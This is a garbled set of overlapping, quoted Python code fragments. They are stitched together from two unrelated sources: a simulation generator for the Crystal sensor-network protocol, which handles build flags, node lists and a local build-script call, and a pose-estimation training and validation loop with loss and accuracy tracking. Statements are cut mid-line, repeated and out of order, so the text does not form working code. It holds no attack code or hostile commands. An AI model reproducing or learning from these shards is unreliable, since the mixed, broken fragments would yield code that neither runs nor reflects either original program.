\"crystal.sky\" def prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env): env = os.environ.copy()", "= namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r y z x\") defaults =", "logging: cflags += [\"-DCRYSTAL_LOGGING=1\"] else: cflags += [\"-DDISABLE_UART=1\"] if testbed in (\"indriya\", \"fbk\",", "simulations ------------------------\" all_nodes = set() with open(\"nodelist.txt\") as f: for l in f:", "num_epochs, concurrent_txs)) pwd = os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try: os.makedirs(simdir) except OSError,e:", "nodemap != \"all\" and not os.path.exists(nodemap_txt): raise Exception(\"Node map file does not exist:", "ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path') ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration python file') args", "testbed in (\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"]", "'--config', required=False, default=\"params.py\", help='Configuration python file') args = ap.parse_args() import os from collections", "map file does not exist: \" + nodemap_txt) nodes = set(all_nodes) if nodemap", "num_senders, longskip, n_empty, cca) prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env) if nodemap != \"all\":", "\"w\") as f: p = OrderedDict() p[\"testbed\"] = testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"]", "import re import random basepath = args.basepath #apppath = os.path.join(basepath, \"apps\", \"glossy-test\") #apppath", "l = l.strip() if l: all_nodes.add(int(l.strip())) simnum = 0 for (power, channel, sink,", "tbl += rnd_unique(nodes, concurrent_txs) return \"static const uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for x", "4, 0)], \"nodemaps\":[\"all\"], 
\"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, } set_defaults(pars, defaults)", "p[\"testbed\"] = testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] = active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"]", "l in f: l = l.strip() if l: all_nodes.add(int(l.strip())) simnum = 0 for", "import namedtuple, OrderedDict from shutil import copy, rmtree import traceback import subprocess import", "OSError,e: print e nodelist = os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\") as f: for", "pars globals().update(pars) print \"--- Preparing simulations ------------------------\" all_nodes = set() with open(\"nodelist.txt\") as", "import traceback ap = argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path') ap.add_argument('-c', '--config',", "path') ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration python file') args = ap.parse_args() import os", "\"sndtbl.c\") abs_env_name = abs_bname + \".env\" with open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes, num_epochs,", "= n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"] = dur_t p[\"sync_ack\"] =", "argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path') ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration python", "+= [\"-DSHORT_LOGS=1\"] if testbed == \"cooja\": cflags += [\"-DCOOJA=1\"] if testbed in (\"indriya\",", "return r def generate_table_array(nodes, num_epochs, concurrent_txs): tbl = [] if seed is not", "boot_chop) if os.path.isdir(simdir): continue try: nodemap_txt = nodemap+\".txt\" if nodemap != \"all\" and", "\"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging: 
cflags += [\"-DCRYSTAL_LOGGING=1\"] else: cflags += [\"-DDISABLE_UART=1\"]", "copy(abs_tbl_name, simdir) def mk_env(power, channel, sink, num_senders, longskip, n_empty, cca): cflags = [", "#\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, } set_defaults(pars, defaults) print \"using the following params\" print", "f: for n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) copy(abs_tbl_name,", "nodes if x!=sink] new_env = mk_env(power, channel, sink, num_senders, longskip, n_empty, cca) prepare_binary(simdir,", "= n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"] =", "dur_a p[\"dur_t\"] = dur_t p[\"sync_ack\"] = sync_ack p[\"longskip\"] = longskip p[\"n_empty\"] = n_empty.r", "except Exception, e: traceback.print_exc() if os.path.isdir(simdir): rmtree(simdir) raise e print \"%d simulation(s) generated\"%simnum", "basepath = args.basepath #apppath = os.path.join(basepath, \"apps\", \"glossy-test\") #apppath = os.path.join(basepath, \"apps\", \"ta\")", "p.values()]) f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum += 1 except Exception, e: traceback.print_exc() if", "simdir) copy(abs_tbl_name, simdir) def mk_env(power, channel, sink, num_senders, longskip, n_empty, cca): cflags =", "channel p[\"period\"] = period p[\"senders\"] = num_senders p[\"sink\"] = sink p[\"n_tx_s\"] = n_tx_s", "= NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power, channel, period, n_tx_s,", "testbed in (\"indriya\", \"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\", \"fbk\",", "p[\"n_tx_s\"] = n_tx_s p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"]", "copy(nodemap_txt, os.path.join(simdir, 
\"nodemap.txt\")) num_nodes = len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as f: p", "collections import namedtuple, OrderedDict from shutil import copy, rmtree import traceback import subprocess", "[\"-DSHORT_LOGS=1\"] if testbed == \"cooja\": cflags += [\"-DCOOJA=1\"] if testbed in (\"indriya\", \"fbk\"):", "cca): cflags = [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t,", "\" \".join([str(x) for x in p.values()]) f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum += 1", "nodemap != \"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes = len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\")", "\"crystal.sky\" def prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env): env = os.environ.copy() env.update(new_env) abs_bname =", "n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed, nodemap, chmap, boot_chop) if os.path.isdir(simdir): continue try:", "NemptyTuple = namedtuple(\"NemptyTuple\", \"r y z x\") defaults = { \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0,", "dst[k] = v CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r y", "os.path.join(simdir, \"nodemap.txt\")) num_nodes = len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as f: p =", "argparse import traceback ap = argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path') ap.add_argument('-c',", "if sink not in nodes: raise Exception(\"Sink node doesn't exist\") all_senders = [x", "abs_tbl_name = os.path.join(apppath, \"sndtbl.c\") abs_env_name = abs_bname + \".env\" with open(abs_tbl_name, \"w\") 
as" ]
[ "+= val * n self.count += n self.avg = self.sum / self.count if", "model, criterion, optimizer, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter()", "'.join(['| {:.3f}'.format(value) for value in values]) + ' |' ) class AverageMeter(object): \"\"\"Computes", "num_images, :, 2:3] = maxvals # double check this all_boxes parts all_boxes[idx:idx +", "print('=> The average inference time is :', time_gpu / len(val_loader)) name_values, perf_indicator =", "in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs = model(input) target = target[0].cuda(non_blocking=True) target_hm =", "target, pred*4, outputs, prefix + '_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs, prefix)", "model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target, target_weight) loss_D_kd = criterion(D_output_detach, teacher_output, target_weight) loss_D =", "average inference time is :', time_gpu / len(val_loader)) name_values, perf_indicator = val_dataset.evaluate( config,", "to evaluate mode model.eval() num_samples = len(val_dataset) all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3),", "target, target_weight) num_images = input.size(0) # measure accuracy and record loss losses.update(loss.item(), num_images)", "measure accuracy and record loss losses.update(loss.item(), num_images) _, avg_acc, cnt, pred = accuracy(output,", "flipped heatmap for higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :, 1:] = \\", "= -criterion(output, target, target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure accuracy and record", "c[:, 0:2] all_boxes[idx:idx + num_images, 2:4] = s[:, 0:2] all_boxes[idx:idx + num_images, 4]", "= writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps ) writer.add_scalar( 'valid_acc', acc.avg, global_steps ) if", "'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' 
\\ 'Speed {speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss", "full_arch_name): names = name_value.keys() values = name_value.values() num_values = len(name_value) logger.info( '| Arch", "output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter() losses = AverageMeter() acc", "c, s) all_preds[idx:idx + num_images, :, 0:2] = preds[:, :, 0:2] all_preds[idx:idx +", "accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :, 1:] = \\ output_flipped.clone()[:, :, :, 0:-1]", "args, train_loader, models, criterion, optimizers, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time", "def validate(config, args, val_loader, val_dataset, model, criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time =", "= (output + output_flipped) * 0.5 if not cpu: target = target[0].cuda(non_blocking=True) target_hm", "* 0.5 if not cpu: target = target[0].cuda(non_blocking=True) target_hm = target target_weight =", "writer.add_scalar( 'valid_acc', acc.avg, global_steps ) if isinstance(name_values, list): for name_value in name_values: writer.add_scalars(", "= [_.cuda(non_blocking=True) for _ in inputs] target = targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta", "values = name_value.values() num_values = len(name_value) logger.info( '| Arch ' + ' '.join(['|", "full_arch_name[:8] + '...' 
logger.info( '| ' + full_arch_name + ' ' + '", "' + full_arch_name + ' ' + ' '.join(['| {:.3f}'.format(value) for value in", "+ ' '.join(['| {:.3f}'.format(value) for value in values]) + ' |' ) class", "self.val = val self.sum += val * n self.count += n self.avg =", "time is :', time_gpu / len(val_loader)) name_values, perf_indicator = val_dataset.evaluate( config, all_preds, output_dir,", "from __future__ import print_function import time import logging import os, copy import numpy", "s = meta['scale'].numpy() score = meta['score'].numpy() preds, maxvals = get_final_preds( config, args, output.clone().cpu().numpy(),", "logging import os, copy import numpy as np import torch from core.evaluate import", "cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if", "pred*4, outputs, prefix) def validate(config, args, val_loader, val_dataset, model, criterion, output_dir, tb_log_dir, writer_dict=None,", "({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses,", "* n self.count += n self.avg = self.sum / self.count if self.count !=", "import os, copy import numpy as np import torch from core.evaluate import accuracy", "target, target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs = model(input) target =", "acc = AverageMeter() # switch to evaluate mode model.eval() num_samples = len(val_dataset) all_preds", "- infer_start) if isinstance(outputs, list): output = outputs[-1] else: output = outputs if", "= flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy())", "[{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy 
{acc.val:.3f} ({acc.avg:.3f})'.format(", "accuracy(output, target, args=None, cfg=config) output = _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end", "{batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f}", "val_loader, val_dataset, model, criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time = AverageMeter() losses =", "(num_values+1) + '|') if len(full_arch_name) > 15: full_arch_name = full_arch_name[:8] + '...' logger.info(", "(c) Microsoft # Licensed under the MIT License. # Written by <NAME> (<EMAIL>)", "0:2] = c[:, 0:2] all_boxes[idx:idx + num_images, 2:4] = s[:, 0:2] all_boxes[idx:idx +", "accuracy and record loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt, pred = accuracy(output, target,", "({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix =", "'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer", "list): model = model[0].train() model_D = model[1].train() else: model.train() end = time.time() for", "nn from tqdm import tqdm import torch.nn.functional as F logger = logging.getLogger(__name__) def", "meta['model_supervise_channel'] > 0.5 if isinstance(inputs, list): inputs = [_.cuda(non_blocking=True) for _ in inputs]", "inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1, len(inputs)): tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1)", "c = meta['center'].numpy() s = meta['scale'].numpy() score = meta['score'].numpy() preds, maxvals = get_final_preds(", "logger.info( '| Arch ' + ' '.join(['| {}'.format(name) for name in names]) +", "config.TEST.SHIFT_HEATMAP: 
output_flipped[:, :, :, 1:] = \\ output_flipped.clone()[:, :, :, 0:-1] output =", "range(1, len(inputs)): tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with torch.no_grad(): teacher_output", "all_preds[idx:idx + num_images, :, 2:3] = maxvals # double check this all_boxes parts", "batch_time = AverageMeter() data_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() if", "\"\"\"Computes and stores the average and current value\"\"\" def __init__(self): self.reset() def reset(self):", "0 self.count = 0 def update(self, val, n=1): self.val = val self.sum +=", "meta) in tqdm(enumerate(val_loader)): if not cpu: input = input.cuda() # compute output torch.cuda.synchronize()", "in range(1, len(inputs)): tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with torch.no_grad():", "in name_values: writer.add_scalars( 'valid', dict(name_value), global_steps ) else: writer.add_scalars( 'valid', dict(name_values), global_steps )", "= model(input) infer_end = time.time() torch.cuda.synchronize() time_gpu += (infer_end - infer_start) if isinstance(outputs,", "= val_dataset.evaluate( config, all_preds, output_dir, all_boxes, image_path, filenames, imgnums ) model_name = config.MODEL.NAME", "({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time,", "output def _print_name_value(name_value, full_arch_name): names = name_value.keys() values = name_value.values() num_values = len(name_value)", "0. 
for i, (input, target, target_weight, meta) in tqdm(enumerate(val_loader)): if not cpu: input", "prefix + '_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs, prefix) def validate(config, args,", "batch_time.update(time.time() - end) end = time.time() # corresponding center scale joint c =", "list_index in range(1, len(inputs)): tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with", "name_values, perf_indicator = val_dataset.evaluate( config, all_preds, output_dir, all_boxes, image_path, filenames, imgnums ) model_name", "= model(input) target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss =", "and do update step optimizer.zero_grad() loss.backward() optimizer.step() # measure accuracy and record loss", "= inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1, len(inputs)): tmp += inputs[list_index] *", "model(tmp) output = outputs loss_G = -criterion(output, target, target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step()", "target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(outputs, target,", "= target_weight.cuda(non_blocking=True) loss = criterion(outputs, target, target_weight) # compute gradient and do update", "outputs[-1] else: output = outputs if config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped = model(input_flipped)", "check this all_boxes parts all_boxes[idx:idx + num_images, 0:2] = c[:, 0:2] all_boxes[idx:idx +", "+= num_images if i % config.PRINT_FREQ == 0: msg = 'Test: [{0}/{1}]\\t' \\", "{batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time,", "= get_final_preds( config, args, output.clone().cpu().numpy(), c, s) 
all_preds[idx:idx + num_images, :, 0:2] =", "'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg)", ":, 2:3] = maxvals # double check this all_boxes parts all_boxes[idx:idx + num_images,", "= AverageMeter() if isinstance(model, list): model = model[0].train() model_D = model[1].train() else: model.train()", "for net in nets: if net is not None: for param in net.parameters():", "imgnums ) model_name = config.MODEL.NAME if isinstance(name_values, list): for name_value in name_values: _print_name_value(name_value,", "= AverageMeter() acc = AverageMeter() # switch to evaluate mode model.eval() num_samples =", "target_weight, meta) in tqdm(enumerate(val_loader)): if not cpu: input = input.cuda() # compute output", "i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps =", "target, args=None, cfg=config) output = _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end =", "writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps ) writer.add_scalar( 'valid_acc', acc.avg, global_steps", "<NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from __future__ import absolute_import from __future__ import division from", "# markdown format output def _print_name_value(name_value, full_arch_name): names = name_value.keys() values = name_value.values()", "SoftArgmax2D from utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda from utils.vis import", "scale joint c = meta['center'].numpy() s = meta['scale'].numpy() score = meta['score'].numpy() preds, maxvals", "aligned, shift flipped heatmap for higher accuracy if config.TEST.SHIFT_HEATMAP: 
output_flipped[:, :, :, 1:]", "\\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val,", "perf_indicator # markdown format output def _print_name_value(name_value, full_arch_name): names = name_value.keys() values =", "'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s", "compute gradient and do update step set_require_grad(model, False) optimizer_G.zero_grad() outputs = model(tmp) output", "n self.count += n self.avg = self.sum / self.count if self.count != 0", "end = time.time() for i, (inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() -", "batch_time.update(time.time() - end) end = time.time() if i % config.PRINT_FREQ == 0: msg", "target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs = model(input) target = target[0].cuda(non_blocking=True)", "{data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader),", "targets, target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) # mask_channel = meta['model_supervise_channel'] >", "for name in names]) + ' |' ) logger.info('|---' * (num_values+1) + '|')", "all_boxes[idx:idx + num_images, 4] = np.prod(s*200, 1) all_boxes[idx:idx + num_images, 5] = score", "# compute gradient and do update step optimizer.zero_grad() loss.backward() optimizer.step() # measure accuracy", "optimizer, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter() losses =", "# ------------------------------------------------------------------------------ from __future__ import absolute_import from __future__ import division from __future__ 
import", "i % config.PRINT_FREQ == 0: msg = 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t'", "names]) + ' |' ) logger.info('|---' * (num_values+1) + '|') if len(full_arch_name) >", "target, pred*4, outputs, prefix) def validate(config, args, val_loader, val_dataset, model, criterion, output_dir, tb_log_dir,", "train(config, args, train_loader, model, criterion, optimizer, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter()", "isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1] else: output_flipped = outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs)", "target_weight = target_weight.cuda(non_blocking=True) loss = criterion(output, target, target_weight) num_images = input.size(0) # measure", "in values]) + ' |' ) class AverageMeter(object): \"\"\"Computes and stores the average", "if i % config.PRINT_FREQ == 0: msg = 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s", "= models[1].train() model_teacher = models[2].eval() else: models.train() optimizer = optimizers[0] optimizer_G = optimizers[1]", "= 0 self.count = 0 def update(self, val, n=1): self.val = val self.sum", "set_require_grad(model, True) optimizer.zero_grad() tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1, len(inputs)):", "else: output_flipped = outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu: output_flipped =", "inputs = inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model, True)", "({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir, 'val'), i", "for name_value in name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name) if writer_dict: writer =", 
"isinstance(name_values, list): for name_value in name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name) if writer_dict:", "model_name) if writer_dict: writer = writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps", "outputs, prefix + '_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs, prefix) def validate(config,", "0:2] = preds[:, :, 0:2] all_preds[idx:idx + num_images, :, 2:3] = maxvals #", "accuracy(output, target, args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if", ") logger.info('|---' * (num_values+1) + '|') if len(full_arch_name) > 15: full_arch_name = full_arch_name[:8]", "+ num_images, 0:2] = c[:, 0:2] all_boxes[idx:idx + num_images, 2:4] = s[:, 0:2]", "writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] = global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i)", "is not None: for param in net.parameters(): param.requires_grad = requires_grad def train_advmix(config, args,", "num_images) _, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) output = _tocuda(output)", "global_steps ) writer_dict['valid_global_steps'] = global_steps + 1 return name_values, perf_indicator # markdown format", "import torch.nn.functional as F logger = logging.getLogger(__name__) def train(config, args, train_loader, model, criterion,", "perf_indicator = val_dataset.evaluate( config, all_preds, output_dir, all_boxes, image_path, filenames, imgnums ) model_name =", "- end) outputs = model(input) target = target[0].cuda(non_blocking=True) target_hm = target target_weight =", "optimizers[1] end = time.time() for i, (inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time()", "global_steps) writer.add_scalar('train_acc', acc.val, global_steps) 
writer_dict['train_global_steps'] = global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'),", "= val self.sum += val * n self.count += n self.avg = self.sum", "_tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() # corresponding center scale", "loss_D_hm * (1 - args.alpha) + loss_D_kd * args.alpha loss_D.backward() optimizer.step() # G:", "global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps ) writer.add_scalar( 'valid_acc', acc.avg, global_steps )", "= metas[0] else: inputs = inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input),", "loss_G = -criterion(output, target, target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure accuracy and", "* args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure accuracy and record loss losses.update(loss_D.item(), inputs[0].size(0)) _,", "global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] = global_steps +", "mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1, len(inputs)): tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach =", "prefix = '{}_{}'.format( os.path.join(output_dir, 'val'), i ) save_debug_images(config, input, meta, target_hm, pred *", "models, criterion, optimizers, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter()", "Microsoft # Licensed under the MIT License. 
# Written by <NAME> (<EMAIL>) #", "name_value in name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name) if writer_dict: writer = writer_dict['writer']", "cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy()) # feature is not aligned,", "_, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() -", "+ '...' logger.info( '| ' + full_arch_name + ' ' + ' '.join(['|", "num_images, 2:4] = s[:, 0:2] all_boxes[idx:idx + num_images, 4] = np.prod(s*200, 1) all_boxes[idx:idx", "{speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f}", "[{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t'", "pred*4, outputs, prefix) def set_require_grad(nets, requires_grad=True): if not isinstance(nets, list): nets = [nets]", "= torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy()) # feature is not aligned, shift flipped", "for higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :, 1:] = \\ output_flipped.clone()[:, :,", "isinstance(nets, list): nets = [nets] for net in nets: if net is not", "- end) end = time.time() if i % config.PRINT_FREQ == 0: msg =", "end = time.time() for i, (input, target, target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() -", "if isinstance(models, list): model = models[0].train() model_G = models[1].train() model_teacher = models[2].eval() else:", "criterion, optimizer, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter() losses", "= np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes 
